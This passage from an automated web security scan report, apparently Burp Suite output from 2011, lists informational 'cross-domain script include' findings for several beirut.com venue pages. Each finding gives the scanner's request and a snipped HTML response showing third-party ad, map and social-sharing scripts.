<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw" type="text/javascript"></script>
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.583. http://www.beirut.com/Movies/Cinemas/Dunes/1083

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Movies/Cinemas/Dunes/1083

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Movies/Cinemas/Dunes/1083 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:45:40 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw" type="text/javascript"></script>
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.584. http://www.beirut.com/Movies/Cinemas/Grand-Cinemas-ABC/1087

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Movies/Cinemas/Grand-Cinemas-ABC/1087

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Movies/Cinemas/Grand-Cinemas-ABC/1087 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:58:33 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62104

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw" type="text/javascript"></script>
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.585. http://www.beirut.com/Movies/Cinemas/Grand-Concorde/1086

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Movies/Cinemas/Grand-Concorde/1086

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Movies/Cinemas/Grand-Concorde/1086 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:48:35 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw" type="text/javascript"></script>
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.586. http://www.beirut.com/Movies/Cinemas/Metropolis-Empire-Sofil/1085

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Movies/Cinemas/Metropolis-Empire-Sofil/1085

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Movies/Cinemas/Metropolis-Empire-Sofil/1085 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:46:58 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw" type="text/javascript"></script>
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.587. http://www.beirut.com/Movies/Cinemas/Sodeco/1084

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Movies/Cinemas/Sodeco/1084

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Movies/Cinemas/Sodeco/1084 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:46:03 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60771

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw" type="text/javascript"></script>
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.588. http://www.beirut.com/Museums/14

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Museums/14

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Museums/14 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:33:15 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58532

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.589. http://www.beirut.com/Nightlife/Downtown/I-Bar/67

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Nightlife/Downtown/I-Bar/67

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Nightlife/Downtown/I-Bar/67 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:39:45 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88782


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw" type="text/javascript"></script>
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.590. http://www.beirut.com/Nightlife/Gemmayzeh/Godot/85

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Nightlife/Gemmayzeh/Godot/85

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Nightlife/Gemmayzeh/Godot/85 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:39:23 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81225


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw" type="text/javascript"></script>
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.591. http://www.beirut.com/Nightlife/Gemmayzeh/Joe-Penas/91

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Nightlife/Gemmayzeh/Joe-Penas/91

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Nightlife/Gemmayzeh/Joe-Penas/91 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:38:19 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 82953


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw" type="text/javascript"></script>
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.592. http://www.beirut.com/Nightlife/Hamra/Li-Beirut/1885

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Nightlife/Hamra/Li-Beirut/1885

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Nightlife/Hamra/Li-Beirut/1885 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:39:31 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 102363


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw" type="text/javascript"></script>
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

